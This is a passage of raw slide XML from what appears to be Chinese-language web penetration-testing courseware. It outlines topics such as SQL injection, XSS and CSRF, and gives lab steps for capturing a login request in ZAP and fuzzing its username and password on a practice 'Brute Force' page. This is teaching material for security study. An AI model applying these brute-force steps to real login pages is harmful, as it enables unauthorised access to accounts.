              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、使用拦截代理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）切换到ZAP，在“历史”选项卡中，记录了Firefox浏览器访问的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 28"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976120" y="2181225"/>
            <a:ext cx="7108190" cy="4449445"/>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1108690" cy="4738370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（1）在Brute Force（暴力破解）页面，用户名输入test，密码输入test，点击Login，这时出现用户名和/或密码错误。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin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31"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3034665" y="2701925"/>
            <a:ext cx="5885180" cy="2458720"/>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49375"/>
            <a:ext cx="11026140" cy="4738370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（2）切换到ZAP，在历史选项卡中，鼠标指向并双击带有?username=test&amp;password=test的地址，在请求选项卡中会出现你选择的页面。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">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4" name="图片 32"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1337945" y="2587625"/>
            <a:ext cx="9387840" cy="3898265"/>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428351" y="36680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428351" y="1275490"/>
            <a:ext cx="1192345" cy="671830"/>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428351" y="2189890"/>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54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4428351" y="3098575"/>
            <a:ext cx="1192345" cy="676910"/>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6" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>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04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="平行四边形 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5337810" y="384810"/>
            <a:ext cx="5142865" cy="612775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="平行四边形 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5338445" y="1299210"/>
            <a:ext cx="5142865" cy="612775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="平行四边形 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339080" y="2213610"/>
            <a:ext cx="5142865" cy="612775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="平行四边形 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339715" y="3128010"/>
            <a:ext cx="5142865" cy="612775"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 48207"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="158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3" name="组合 82"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4428351" y="4018055"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="平行四边形 83"/>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latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="86" name="组合 85"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4428351" y="4926740"/>
            <a:ext cx="1192345" cy="671830"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="平行四边形 86"/>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latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915928"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="89" name="组合 88"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4428351" y="5841140"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="平行四边形 89"/>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latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="平行四边形 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5340350" y="4042410"/>
            <a:ext cx="5142865" cy="612775"/>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p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="平行四边形 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5340985" y="4956810"/>
            <a:ext cx="5142865" cy="612775"/>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p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="平行四边形 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5341620" y="5871210"/>
            <a:ext cx="5142865" cy="612775"/>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p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620385" y="409575"/>
            <a:ext cx="4064000" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>6.1 Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>渗透测试工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620385" y="1319530"/>
            <a:ext cx="4064000" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>6.2 SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620385" y="2238375"/>
            <a:ext cx="4064000" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>文件上传漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620385" y="3140710"/>
            <a:ext cx="4064000" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620385" y="4067175"/>
            <a:ext cx="4064000" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>命令执行漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620385" y="4971415"/>
            <a:ext cx="4064000" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>6 XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>跨站脚本漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620385" y="5885815"/>
            <a:ext cx="4064000" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>7 CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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1+#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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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additive="base">
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="86"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55"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animBg="1"/>
      <p:bldP spid="8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41755"/>
            <a:ext cx="10876280" cy="974725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（3）在请求选项卡空白处右键点击，找到Fuzz…点击，进入Fuzzer界面，删除默认值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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45"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2301240" y="2160270"/>
            <a:ext cx="6751320" cy="4490720"/>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34135"/>
            <a:ext cx="11195685" cy="1498600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
